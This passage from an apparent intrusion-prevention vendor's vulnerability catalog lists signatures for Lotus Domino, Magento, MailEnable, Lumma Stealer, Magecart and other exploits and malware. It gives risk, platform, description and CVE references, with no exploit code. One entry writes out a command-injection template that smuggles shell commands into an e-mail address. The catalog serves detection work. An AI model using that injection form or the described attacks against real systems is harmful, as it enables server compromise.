NTP_UDP-NTP-Response-With-Same-Source-And-Destination-Ports

References:

CVE-2024-2169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2169

Lop

About this vulnerability:	Lop
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Lop
Type:	Misconfiguration
Description:	Lop is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Lop

LordEK-Traffic

About this vulnerability:	LordEK traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1180-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Lord exploit kit traffic was detected.
Situation:	HTTP_CRL-LordEK-Traffic

Lotus-Domino-Directory-Traversal

About this vulnerability:

Lotus Domino directory traversal

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lotus Domino

Type:

Directory Traversal

Description:

A directory traversal vulnerability allows a remote attacker to read arbitrary files from a Domino server, including files that contain passwords and other sensitive information. Successful exploitation of this vulnerability may provide the attacker enough information to fully compromise the system.

Situation:

HTTP_CSU-Lotus-Notes-Directory-Traversal

References:

CVE-2001-0009
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0009

BID-2173
http://www.securityfocus.com/bid/2173

OSVDB-1703
http://www.osvdb.org/1703

Lotus-Domino-HTTP-Server-Msdos-Device-Name-DoS

About this vulnerability:

Denial of Service (DoS) vulnerability in Lotus Domino HTTP server

Risk:

Low

First detected in:

sgpkg-ips-18-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lotus Domino

Type:

Malfunction

Description:

Lotus Domino HTTP Server is vulnerable to a Denial of Service (DoS) attack. A remote attacker can make approximately 400 access attempts to DOS devices to cause the server to crash.

Situation:

IMAP_Authenticate-Command-Buffer-Overflow-2
IMAP_Authenticate-Command-Buffer-Overflow

References:

CVE-2001-0602
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0602

BID-2575
http://www.securityfocus.com/bid/2575

BID-4019
http://www.securityfocus.com/bid/4019

BID-4020
http://www.securityfocus.com/bid/4020

OSVDB-10810
http://www.osvdb.org/10810

Lotus-Domino-IMAP-Server-Cram-md5-Authentication-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in IBM Lotus Domino

Risk:

High

First detected in:

sgpkg-ips-102-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lotus Domino

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the IBM Lotus Domino IMAP service. The vulnerability is due to a boundary error when processing CRAM-MD5 authentication within the IMAP service of IBM Lotus Domino software. Successful exploitation of this vulnerability allows unauthenticated remote attackers to create a denial of service condition or execute arbitrary code on the vulnerable system in the context of the affected application, commonly System.

Situation:

References:

CVE-2007-1675
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1675

BID-23172
http://www.securityfocus.com/bid/23172

Lotus-Domino-Web-Access-ActiveX-Control-Server-Name-Buffer-Overflow

About this vulnerability:	A buffer overflow vulnerability in IBM Lotus Domino
Risk:	High
First detected in:	sgpkg-ips-291-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Lotus Domino
Type:	Buffer Overflow
Description:	There is a buffer overflow vulnerability in multiple ActiveX controls that are part of IBM Lotus Domino. The vulnerability is due to a boundary error when handling malformed data. A remote attacker can exploit the vulnerability by enticing the target user to visit a malicious web page. Successful exploitation causes memory corruption that may lead to arbitrary code execution in the security context of the logged in user.
Situation:	HTTP_SS-Lotus-Domino-Web-Access-ActiveX-Control-Server-Name-Buffer-Overflow File-Text_Lotus-Domino-Web-Access-ActiveX-Control-Server-Name-Buffer-Overflow

Lotus-Notes-URI-Handler-Argument-Injection

About this vulnerability:

A vulnerability in Lotus Notes

Risk:

High

First detected in:

sgpkg-ips-420-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Lotus Notes

Type:

Input Validation

Description:

There is a vulnerability in the URI scheme handling process in IBM's Lotus Notes client. This vulnerability allows a malicious attacker to entice a victim to load the Lotus Notes client with a crafted configuration file. This configuration file could be retrieved from a remote system using a UNC pathname. It is possible for an attacker to specify code to be loaded and executed by the Lotus Notes client using this configuration file.

Situation:

File-Text_Lotus-Notes-URI-Handler-Argument-Injection

References:

CVE-2004-0480
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0480

BID-10600
http://www.securityfocus.com/bid/10600

LPD-SAPlpd-Multiple-Commands-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerabilities in SAPlpd and SAPSprint

Risk:

Moderate

First detected in:

sgpkg-ips-267-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

SAPlpd

Type:

Buffer Overflow

Description:

SAPlpd versions 6.28 and earlier contain multiple buffer overflow vulnerabilities. A successful exploit allows remote attackers to execute arbitrary code on the vulnerable host.

Situation:

Printer_CS-SAPlpd-Multiple-Command-Buffer-Overflow

References:

CVE-2008-0621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0621

BID-27613
http://www.securityfocus.com/bid/27613

Lpd-Sendmail-System-Compromise

About this vulnerability:

System compromise vulnerability in lpd

Risk:

Moderate

First detected in:

sgpkg-ips-15-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Solaris

Software:

lpd

Type:

Malfunction

Description:

The line printer daemon (lpd) could be used to specify arguments to sendmail. An attacker could manipulate the control and data files to execute sendmail with a specified configuration file to gain root access on the system.

Situation:

Printer_Lpd-Sendmail-System-Compromise

References:

CVE-2000-1220
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1220

BID-927
http://www.securityfocus.com/bid/927

Lprng-Format-String-Vulnerability

About this vulnerability:

Format string vulnerability in lprng

Risk:

Moderate

First detected in:

sgpkg-ips-254-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

lprng

Type:

Format String

Description:

A malicious user can pass a string that's then passed to syslog as the format string. This can be exploited to gain superuser access on the target host.

Situation:

Printer_Lpr-Format-String-Attack

References:

CVE-2000-0917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0917

BID-1712
http://www.securityfocus.com/bid/1712

Lucee-Administrator-imgProcess-Arbitrary-File-Write

About this vulnerability:

A vulnerability in Lucee.

Risk:

High

First detected in:

sgpkg-ips-1401-5242

Last changed:

sgpkg-ips-1564-5242

Platform:

Unix; Linux

Software:

Lucee

Type:

Input Validation

Description:

A vulnerability in Lucee Admin, versions before 5.3.7.47, 5.3.6.68 and 5.3.5.96, which allows remote attackers to execute arbitrary commands due to the possible arbitrary file write in Lucee Administrator's imgProcess.cfm.

Situation:

HTTP_CSU-Lucee-Administrator-imgProcess-Arbitrary-File-Write

References:

CVE-2021-21307
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21307

Lucee-Authenticated-Scheduled-Job-Code-Execution

About this vulnerability:	A vulnerability in Lucee.
Risk:	High
First detected in:	sgpkg-ips-1564-5242
Last changed:	sgpkg-ips-1564-5242
Platform:	Unix; Windows
Software:	Lucee
Type:	Input Validation
Description:	A vulnerability in Lucee which allows remote attackers to execute a payload on Lucee servers by creating a scheduled job that queries a remote ColdFusion file, which is then downloaded and executed when accessed.
Situation:	HTTP_CRL-Lucee-Authenticated-Scheduled-Job-Code-Execution

LuminosityLink-RAT-C2-Traffic

About this vulnerability:	LuminosityLink RAT C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1093-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	LuminosityLink RAT is a publicly sold remote access trojan. It can be used to view files, record keystrokes and spy webcam on victim's computer.
Situation:	Generic_TCP-LuminosityLink-RAT-C2-Traffic

Lumma-Stealer-C2-Activity

About this vulnerability:	Lumma Stealer command-and-control traffic detected
Risk:	High
First detected in:	sgpkg-ips-1772-5242
Last changed:	sgpkg-ips-1772-5242
Platform:	Windows
Software:	Lumma Stealer
Type:	Backdoor
Description:	Lumma Stealer is a type of trojans that targets the Windows platform. The malware collects system information (e.g., computer name, user name) and browser information (e.g., history, cookies). The collected data is sent to the attacker's command-and-control server using HTTPS.
Situation:	HTTP_CSU-Lumma-Stealer-C2-Activity

Maarch-LetterBox-Unrestricted-File-Upload

About this vulnerability:

Maarch LetterBox Unrestricted File Upload vulnerability.

Risk:

High

First detected in:

sgpkg-ips-686-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Maarch LetterBox

Type:

Insecure Configuration

Description:

An unrestricted file upload vulnerability exists in Maarch-LetterBox 2.8 and earlier, do to the lack of file type verification, which allows remote attackers to execute arbitrary PHP code by uploading a file with a PHP extension and then accessing it via a request to the file name.

Situation:

HTTP_CS-Maarch-LetterBox-Unrestricted-File-Upload

References:

CVE-2015-1587
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1587

OSVDB-113928
http://www.osvdb.org/113928

Maazben-Bot

About this vulnerability:	Maazben Bot
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Maazben is a Botnet used for sending spam messages.
Situation:	HTTP_CSH-Maazben-Bot-Traffic

Mac-OS-X-Dmg-UFS-ffs_mountfs-Integer-Overflow

About this vulnerability:

A vulnerability in Mac OS X

Risk:

High

First detected in:

sgpkg-ips-584-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Mac OS X

Software:

<os>

Type:

Input Validation

Description:

There is an integer overflow vulnerability in Mac OS X, that can be triggered by a malformed disk image (DMG) file.

Situation:

File-Binary_Mac-OS-X-Dmg-UFS-ffs_mountfs-Integer-Overflow

References:

CVE-2007-0229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0229

BID-21993
http://www.securityfocus.com/bid/21993

OSVDB-32684
http://www.osvdb.org/32684

Macontrol

About this vulnerability:	MaControl
Risk:	High
First detected in:	sgpkg-ips-622-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	MaControl is a backdoor for Mac OS X. It may arrive inside a malicious zip-file e-mail attachment. The backdoor allows a remote attacker to list files, transfer files and run commands on the infected machine.
Situation:	HTTP_CS-Macontrol-Traffic

MacOS-Gatekeeper-Check-Bypass-CVE-2021-30657

About this vulnerability:

A vulnerability in macOS Gatekeeper

Risk:

High

First detected in:

sgpkg-ips-1352-5242

Last changed:

sgpkg-ips-1352-5242

Platform:

Mac OS

Software:

<os>

Type:

Code Injection

Description:

There exists a vulnerability in macOS which may allow shell scripts in specially crafted apps to bypass Gatekeeper checks. This fingerprint detects attempts to exploit the vulnerability via zipped .app files.

Situation:

File-Text_MacOS-Gatekeeper-Check-Bypass-CVE-2021-30657

References:

CVE-2021-30657
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30657

Macromedia-Flash-Media-Server-Administration-Service-Denial-of-Service

About this vulnerability:

A Macromedia Flash Media Server Administration Service Denial of Service vulnerability

Risk:

High

First detected in:

sgpkg-ips-1000-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Macromedia Flash Media Server

Type:

Malfunction

Description:

A vulnerability in Macromedia Flash Media Server Administration Service which allows remote attackers to create a denial of service condition by sending a crafted message to the server, due to an error in the way that the affected server handles malformed data.

Situation:

Generic_CS-Macromedia-Flash-Media-Server-Administration-Service-Denial-of-Service

References:

CVE-2005-4216
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4216

Macromedia-Flash-Player-LoadMovie-DoS

About this vulnerability:	A vulnerability in Adobe Systems Macromedia Flash Player
Risk:	Low
First detected in:	sgpkg-ips-436-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Adobe Flash Player
Type:	Malfunction
Description:	Macromedia Flash player plug-in is a multi-media module/plug-in for displaying Flash content within an HTML web page. A vulnerability exists in the way Macromedia Flash Player plug-in handles an object when it attempts to load a movie. A malicious attacker could crash a vulnerable Flash Player with a specially crafted script in a web page. When a user with a vulnerable version of Macromedia Flash installed attempts to open a web page with a call to LoadMovie() that has the layer parameter set to a value other than zero and second parameter specifying a relative pathname, the browser will terminate.
Situation:	File-Text_Macromedia-Flash-Player-LoadMovie-DoS

Macromedia-JRun-Server-File-Disclosure

About this vulnerability:

A vulnerability in Macromedia JRun

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Macromedia JRun 4

Type:

Input Validation

Description:

There is a vulnerability in the way Macromedia JRun server processes URLs. A specially crafted request for a file can bypass access restrictions on JRun. This can result in the source of the requested script file to be served rather than the intended script output. This vulnerability may be leveraged to reveal sensitive information such as account names, passwords, paths to internal resources, and so on.

Situation:

HTTP_CSU-Macromedia-JRun-Server-File-Disclosure

References:

BID-11245
http://www.securityfocus.com/bid/11245

Macromedia-Shockwave-mwdir.dll-ActiveX-Control-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Macromedia Shockwave

Risk:

High

First detected in:

sgpkg-ips-132-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Macromedia Shockwave

Type:

Buffer Overflow

Description:

There are multiple buffer overflow vulnerabilities in the Macromedia Shockwave ActiveX control.

Situation:

HTTP_SS-Macromedia-Shockwave-mwdir.dll-ActiveX-Control-Buffer-Overflow
File-Text_Macromedia-Shockwave-mwdir.dll-ActiveX-Control-Buffer-Overflow

References:

CVE-2007-1403
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1403

BID-22842
http://www.securityfocus.com/bid/22842

OSVDB-36005
http://www.osvdb.org/36005

Macrovision-InstallShield-Update-Service-ActiveX-Code-Execution

About this vulnerability:

A vulnerability in Macrovision Update Service

Risk:

High

First detected in:

sgpkg-ips-129-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Macrovision Update Service; Macrovision FLEXnet Connect; Macrovision InstallShield

Type:

Malfunction

Description:

There is a vulnerability in the access control of Macrovision InstallShield Update Service ActiveX Control (isusweb.dll). The vulnerability is due to a design error related to webpage script processing. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious webpage, which potentially allows arbitrary code to be executed with the privileges of the currently logged in user.

Situation:

HTTP_SS-Macrovision-InstallShield-Update-Service-ActiveX-Code-Execution
File-Text_Macrovision-InstallShield-Update-Service-ActiveX-Code-Execution

References:

CVE-2007-5660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5660

BID-26280
http://www.securityfocus.com/bid/26280

OSVDB-38347
http://www.osvdb.org/38347

Macrovision-InstallShield-Update-Service-Agent-ActiveX-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in Macrovision InstallShield Update Service

Risk:

High

First detected in:

sgpkg-ips-175-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Macrovision FLEXnet Connect; Macrovision InstallShield; Macrovision Update Service

Type:

Buffer Overflow

Description:

There is a memory corruption vulnerability in the Macrovision InstallShield Update Service ActiveX control implemented in isusweb.dll. The vulnerability is due to a design error while processing calls to a method of the ActiveX control. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious web page, potentially allowing arbitrary code to be injected and executed in the security context of the currently logged in user.

Situation:

HTTP_SS-Macrovision-InstallShield-Update-Service-Agent-ActiveX-Memory-Corruption
File-Text_Macrovision-InstallShield-Update-Service-Agent-ActiveX

References:

CVE-2008-2470
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2470

BID-31235
http://www.securityfocus.com/bid/31235

Magecart-Code-Injection

About this vulnerability:	Magecart code injected into a website
Risk:	Moderate
First detected in:	sgpkg-ips-1274-5242
Last changed:	sgpkg-ips-1423-5242
Platform:	Generic
Software:	<os>
Type:	Code Injection
Description:	Magecart works by operatives gaining access to websites either directly or via third-party services and injecting malicious JavaScript that steals data shoppers enter into online payment forms, typically on checkout pages.
Situation:	File-Text_Magecart-Beacon-2 File-Text_Magecart-Beacon-3 File-Text_Magecart-Beacon-4 File-Text_Magecart-Beacon

Magento-API-Unserialize-Remote-Code-Execution

About this vulnerability:

A vulnerability in Magento Magento

Risk:

Moderate

First detected in:

sgpkg-ips-768-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Magento

Type:

Input Validation

Description:

An object deserialization error in Magento results in a remote code execution vulnerability. The vulnerability can be exploited by sending crafted requests to the server. A successful exploit results in the attacker gaining the ability to write arbitrary files on the target host.

Situation:

File-TextId_Magento-API-Unserialize-Remote-Code-Execution
File-Text_Magento-API-Unserialize-Remote-Code-Execution

References:

CVE-2016-4010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4010

Magento-Forwarded-Parameter-Authentication-Bypass

About this vulnerability:

A vulnerability in Magento

Risk:

High

First detected in:

sgpkg-ips-644-5211

Last changed:

sgpkg-ips-1583-5242

Platform:

Generic

Software:

Magento

Type:

Malfunction

Description:

An authentication bypass vulnerability exists in the e-commerce platform Magento. The vulnerability is due to a logic error when handling a user controlled parameter in the login mechanism. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to the target. Successful exploitation of this vulnerability may allow the attacker to gain access to the target system.

Situation:

HTTP_CSU-Magento-Forwarded-Parameter-Authentication-Bypass

References:

CVE-2015-1398
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1398

OSVDB-121261
http://www.osvdb.org/121261

Magento-Vimeo-Invalid-Image-Cross-Site-Request-Forgery

About this vulnerability:	A vulnerability in Magento Magento
Risk:	Moderate
First detected in:	sgpkg-ips-893-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Magento
Type:	Input Validation
Description:	Insufficient validation of user input to the retrieveImage method causes a cross-site request forgery vulnerability in Magento. A successful exploitation allows an attacker to execute arbitrary code with the privileges of the Magento process.
Situation:	HTTP_CRL-Magento-Vimeo-Invalid-Image-Cross-Site-Request-Forgery

Magic-Winmail-Server-Pass-Format-String-Vuln

About this vulnerability:

Magic Winmail Server PASS format string vulnerability

Risk:

High

First detected in:

sgpkg-ips-279-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Magic Winmail Server

Type:

Format String

Description:

A format string vulnerability exists in the handling of PASS command argument. A successful exploit could lead into remote system compromise.

Situation:

POP3_Format-String-Specifiers-In-Argument-To-Pass

References:

CVE-2003-0391
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0391

MagnusBilling-Application-Unauthenticated-Remote-Command-Execution

About this vulnerability:

An attempt to exploit a vulnerability in MagnusBilling detected

Risk:

High

First detected in:

sgpkg-ips-1648-5242

Last changed:

sgpkg-ips-1648-5242

Platform:

Generic

Software:

MagnusBilling

Type:

Input Validation

Description:

A vulnerability in MagnusBilling, versions 6.x and 7.x, which allows remote attackers to execute arbitrary code via the democ parameter in a request to lib/icepay/icepay.php, due to insufficient input validation.

Situation:

HTTP_CSU-MagnusBilling-Application-Unauthenticated-Remote-Command-Execution

References:

CVE-2023-30258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30258

Mahdi

About this vulnerability:	Mahdi
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Mahdi is a malware that is used for cyber erpionage.
Situation:	HTTP_CSU-Mahdi-Traffic File-Text_HTML-Possible-Mahdi-Traffic

Mail-Manage-EX-Php-Include-Exploit

About this vulnerability:	Mail Manage EX PHP Include Exploit
Risk:	High
First detected in:	sgpkg-ips-631-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	Mail Manage EX
Type:	Input Validation
Description:	There exists a vulnerability in Mail Manage EX. A remote attacker can inject a malicious url for the Settings parameter which can lead to system compromise.
Situation:	HTTP_CRL-Mail-Manage-EX-Php-Include-Exploit

MailCarrier-Buffer-Overflow

About this vulnerability:

A MailCarrier Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-735-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MailCarrier

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in MailCarrier, version 2.51, which allows remote attackers to execute arbitrary code via a long EHLO and HELO command.

Situation:

SMTP_CS-MailCarrier-Buffer-Overflow

References:

CVE-2004-1638
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1638

BID-11535
http://www.securityfocus.com/bid/11535

OSVDB-11174
http://www.osvdb.org/11174

Mailcleaner-Remote-Code-Execution

About this vulnerability:

A vulnerability in Mailcleaner

Risk:

High

First detected in:

sgpkg-ips-1174-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mailcleaner

Type:

Input Validation

Description:

A vulnerability in Mailcleaner which allows remote attackers to execute arbitrary operating system commands due to the insufficient validation of input to /admin/managetracing/search/search.

Situation:

HTTP_CSR-Mailcleaner-Remote-Code-Execution

References:

CVE-2018-20323
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20323

MailEnable-HTTP-Authorization-Header-Buffer-Overflow

About this vulnerability:

A vulnerability in MailEnable MailEnable Enterprise

Risk:

High

First detected in:

sgpkg-ips-355-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MailEnable

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in the way MailEnable processes the HTTPMail protocol. This issue is caused by insufficient boundary checking when data is copied into a fixed size buffer. This vulnerability can be exploited to execute arbitrary code on the target system with privileges of the HTTPMail service process.

Situation:

HTTP_CSH-MailEnable-HTTP-Authorization-Header-Buffer-Overflow

References:

CVE-2005-1348
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1348

BID-13350
http://www.securityfocus.com/bid/13350

OSVDB-15737
http://www.osvdb.org/15737

MailEnable-Professional-1.54-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in MailEnable Professional 1.54

Risk:

High

First detected in:

sgpkg-ips-645-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MailEnable

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in MailEnable Professional 1.54 which allows a remote attacker to execute arbitrary code via a long mailbox name.

Situation:

IMAP_CS-MailEnable-Professional-1.54-Buffer-Overflow

References:

CVE-2005-2278
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2278

BID-14243
http://www.securityfocus.com/bid/14243

OSVDB-17844
http://www.osvdb.org/17844

MailEnable-SMTP-Mailto-Format-String

About this vulnerability:

Format string vulnerability in MailEnable Server

Risk:

High

First detected in:

sgpkg-ips-44-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MailEnable

Type:

Format String

Description:

MailEnable SMTP and POP3 servers have a format string vulnerability in the mailto header handling. A remote attacker could send an SMTP message that contains a malicious mailto header to cause a denial of service and/or to execute arbitrary code on the server.

Situation:

E-Mail_HCS-MailEnable-SMTP-Mailto-Format-String

References:

CVE-2004-0804
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0804

BID-12833
http://www.securityfocus.com/bid/12833

OSVDB-14858
http://www.osvdb.org/14858

MailEnable-SMTP-NTLM-Authentication-Buffer-Overflow

About this vulnerability:	A vulnerability in MailEnable MailEnable
Risk:	Moderate
First detected in:	sgpkg-ips-436-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	MailEnable
Type:	Buffer Overflow
Description:	A buffer overflow vulnerability exists in MailEnable server products. The flaw is caused by insufficient validation checks when processing the signature field of NTLM Type1 messages within the SMTP service. A remote unauthenticated attacker may successfully exploit this vulnerability to execute arbitrary code on the vulnerable machine. In an attack case where code injection is not successful, the affected SMTP service will terminate upon processing of the malicious message. If the SMTP service is not configured to restart automatically, the services will be unavailable until the process is restarted manually. In a more sophisticated attack, where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the SYSTEM account.
Situation:	SMTP_MailEnable-SMTP-NTLM-Authentication-Buffer-Overflow

MailEnable-W3C-Logging-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in MailEnable Enterprise 1.1 and Professional 1.6

Risk:

High

First detected in:

sgpkg-ips-645-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MailEnable

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in the W3C logging for MailEnable Enterprise 1.1 and Professional 1.6 which allows a remote attacker to execute arbitrary code.

Situation:

IMAP_CS-MailEnable-W3C-Logging-Buffer-Overflow

References:

CVE-2005-3155
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3155

BID-15006
http://www.securityfocus.com/bid/15006

OSVDB-19842
http://www.osvdb.org/19842

Mailnews-Cgi-System-Compromise

About this vulnerability:

Mailnews.cgi System Compromise

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Claude Reuter mailnews.cgi

Type:

Input Validation

Description:

The mailnews.cgi script can be exploited to run arbitrary commands by sending e-mail to '; <arbitrary commands>'.

References:

CVE-2001-0271
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0271

BID-2391
http://www.securityfocus.com/bid/2391

Mailstore-Server-Search-Result-Reflected-Cross-Site-Scripting

About this vulnerability:	A vulnerability in MailStore Software MailStore Server
Risk:	Moderate
First detected in:	sgpkg-ips-853-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	MailStore Server
Type:	Input Validation
Description:	Insufficient validation of user input results in a cross-site scripting vulnerability in MailStore Software MailStore Server. A successful exploitation allows an attacker to run arbitrary code on a user's web browser.
Situation:	HTTP_CRL-Mailstore-Server-Search-Result-Reflected-Cross-Site-Scripting

MajorDoMo-Command-Injection

About this vulnerability:

An attempt to exploit a vulnerability in MajorDoMo detected

Risk:

High

First detected in:

sgpkg-ips-1708-5242

Last changed:

sgpkg-ips-1708-5242

Platform:

Linux

Software:

MajorDoMo

Type:

Input Validation

Description:

A vulnerability in MajorDoMo, versions before 0662e5e, which allows remote attackers to bypass input validation by base64 encoding rtsp: or /dev in the url parameter, enebling the execution of arbitrary system commands on the target server through the trasnport parameter.

Situation:

HTTP_CSU-MajorDoMo-Command-Injection

References:

CVE-2023-50917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50917

Majordomo2-Directory-Traversal

About this vulnerability:

A Majordomo2 Directory Traversal vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-789-5211

Last changed:

sgpkg-ips-1638-5242

Platform:

Linux

Software:

Majordomo2

Type:

Directory Traversal

Description:

A vulnerability in Majordomo2, versions before 20110131, which allows remote attackers to read arbitrary files via a dot dot sequence directory traversal using a crafted email or cgi-bin/mj_wwwusr in the web interface.

References:

CVE-2011-0049
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0049

OSVDB-70762
http://www.osvdb.org/70762

Mako-Server-Remote-Command-Injection

About this vulnerability:	A Mako Server Remote Command Injection vulnerability
Risk:	High
First detected in:	sgpkg-ips-1035-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Mako Server
Type:	Input Validation
Description:	A vulnerability in Mako Server, versions 2.5 and 2.6, which allows remote attackers to execute arbitrary code by saving the user input via a POST to save.lsp in the Mako Server tutorial page, and executing the input with a GET request to manage.lsp.
Situation:	HTTP_CRL-Mako-Server-Remote-Command-Injection

Malicious-Ico-File-Used-By-Trojans

About this vulnerability:	A malicious .ico file used by trojanized 3CX VOIP application detected
Risk:	High
First detected in:	sgpkg-ips-1574-5242
Last changed:	sgpkg-ips-1574-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	Trojanized 3CX VOIP applicationicon utilizes icon files hosted on GitHub that contain Base64 encoded strings appended to the end of the images.
Situation:	File-Binary_Malicious-Ico-File-Used-By-Trojans

Malicious-Internet-Shortcut-File

About this vulnerability:	A possibly malicious internet shortcut file was detected
Risk:	Moderate
First detected in:	sgpkg-ips-1068-5242
Last changed:	sgpkg-ips-1802-5242
Platform:	Windows
Software:	<os>
Type:	Script Injection
Description:	Malicious internet shortcut files are usually delivered via email in compressed archives. These internet shortcut files are used to download malicious payload to a system, if the receiver of an email executes the attachment.
Situation:	File-Text_Suspicious-Internet-Shortcut-File File-Text_Malicious-Internet-Shortcut-File File-TextId_Malicious-Internet-Shortcut-File File-TextId_Suspicious-Internet-Shortcut-File

Malicious-Java-Applet-Reference

About this vulnerability:	Attempt to download a malicious Java Applet
Risk:	High
First detected in:	sgpkg-ips-192-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Sun Java Runtime Environment
Type:	Malfunction
Description:	There are various widely used attacks using vulnerablities in Sun Java. These attacks are embedded into web pages as Java applets and may allow arbitary command execution in the context of the local user.
Situation:	HTTP_SS-Malicious-Java-Applet-Reference File-Text_Malicious-Java-Applet-Reference

Malicious-JavaScript-In-PDF

About this vulnerability:	A PDF file with malicious JavaScript detected
Risk:	High
First detected in:	sgpkg-ips-443-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	A malicious piece of JavaScript inside PDF was seen.
Situation:	File-PDF_Malicious-JavaScript-In-PDF-2 File-PDF_Malicious-JavaScript-In-PDF

Malicious-KiXtart-Script-Infection-Traffic

About this vulnerability:	Malicious KiXtart Script infection traffic
Risk:	High
First detected in:	sgpkg-ips-1394-5242
Last changed:	sgpkg-ips-1394-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
